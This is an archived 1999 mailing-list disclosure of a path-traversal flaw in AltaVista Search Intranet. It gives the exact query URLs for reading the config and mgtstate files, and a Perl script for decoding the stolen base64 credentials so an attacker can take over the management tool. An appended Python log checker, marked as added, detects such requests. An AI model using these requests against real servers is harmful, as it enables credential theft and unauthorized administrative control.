AltaVista

From: rudi carell (rudicarellat_private)
Date: Wed Dec 29 1999 - 06:52:46 PST


    good morning folks,
    
    
    ... "With AltaVista Search Software, you can create your own search and
    retrieval Web site with the same relevancy, performance, and efficiency of
    the powerful AltaVista Search engine (www.altavista.com) used to index the
    World Wide Web"  ...
    
    yes that's true .. but,
    
    if you take a closer look at its functionality and file structure you will
    find some interesting things:
    
    
    the template-variable: {mss} in the main search function (cgi-bin/query?)
    allows you one traversal step back and
    shows you any file in the "http - directory".
    
    example: http://we.loverudi.org:9000/cgi-bin/query?../config
    
    if you try to go more than one directory back the program escapes {mss} with
    "@../" ...
    
    nice try .. but much too late .. the http directory contains some very
    interesting files:
    
    ../config               ( Var "MGMT_PW=[ Plaintext MGMT-password ]" )
    ../logs/mgtstate        ( passw=[ encoded mgt-password ]  .. NOT the MGMT-password !!!)
    ../logs/stats.log       ( sometimes stats_log )
    ../logs/access.log      ( sometimes access_log )
    
    forget everything but the "mgtstate" file .. it contains the username:password
    for the online-config tool ( http://we.loverudi.org:9000/cgi-bin/mgt ) in the form:
    
    passw=[ encoded user:password string ]
    
    pfft .. these guys are really smart .. they encode their passwords ... ( base64 :)
    
    now we need a prg/script to decode the user/password - string
    
    ---cut here---
    
    #!/usr/bin/perl
    use MIME::Base64;
    print decode_base64("$ARGV[0]"), "\n";
    
    ---cut here---
    
    thank you ...
    
    then start(goto) the online config tool (
    http://we.loverudi.org:9000/cgi-bin/mgt )
    and do whatever you want ... aso aso aso
    
    have a nice Y2K-BUG
    
    rudicarellat_private
    
    
    other infos:
    
    vulnerable: altavista search intranet 2.??
    type: Input Validation Error
    object: query?
    remote: yes
    vendor: altavista (got informed ~3 months ago)
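
Added example, not part of the original post: a log check an administrator could run to see whether the one-step traversal through cgi-bin/query described above has already been requested against their server. It assumes the access log is in Common Log Format (the post does not show the format); the sample lines, addresses and the benign q= parameter are constructed for the example.

```python
import re
from urllib.parse import unquote

# Files the post names as readable through the one-step traversal.
SENSITIVE = ("config", "logs/mgtstate", "logs/stats.log", "logs/stats_log",
             "logs/access.log", "logs/access_log")

# Assumption: Common Log Format, request field like "GET /path?query HTTP/1.0".
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST|HEAD) (\S+)[^"]*" (\d{3})')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so %2e%2e%2f and %252e... are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_traversal_hits(lines):
    """Return (client, decoded_query, status, sensitive_file_or_None) per hit."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        path, _, query = target.partition("?")
        if not path.endswith("/cgi-bin/query"):
            continue
        query = fully_decode(query).replace("\\", "/")
        if "../" not in query:
            continue
        tail = query.split("../")[-1].split("&")[0]
        hits.append((client, query, int(status),
                     tail if tail in SENSITIVE else None))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Dec/1999:06:40:01 -0800] "GET /cgi-bin/query?q=firewall HTTP/1.0" 200 5120',
    '192.0.2.77 - - [29/Dec/1999:06:41:12 -0800] "GET /cgi-bin/query?../config HTTP/1.0" 200 812',
    '192.0.2.77 - - [29/Dec/1999:06:41:30 -0800] "GET /cgi-bin/query?%2e%2e%2flogs/mgtstate HTTP/1.0" 200 96',
    '192.0.2.77 - - [29/Dec/1999:06:42:02 -0800] "GET /cgi-bin/query?../../etc/hosts HTTP/1.0" 404 210',
]

if __name__ == "__main__":
    for client, query, status, target in find_traversal_hits(SAMPLE_LOG):
        print(f"{client} status={status} query={query!r} sensitive={target}")
```

A hit with status 200 on config or logs/mgtstate means the management credentials should be treated as disclosed and changed, since both files hold them in recoverable form.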
    
    
    
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:24:16 PDT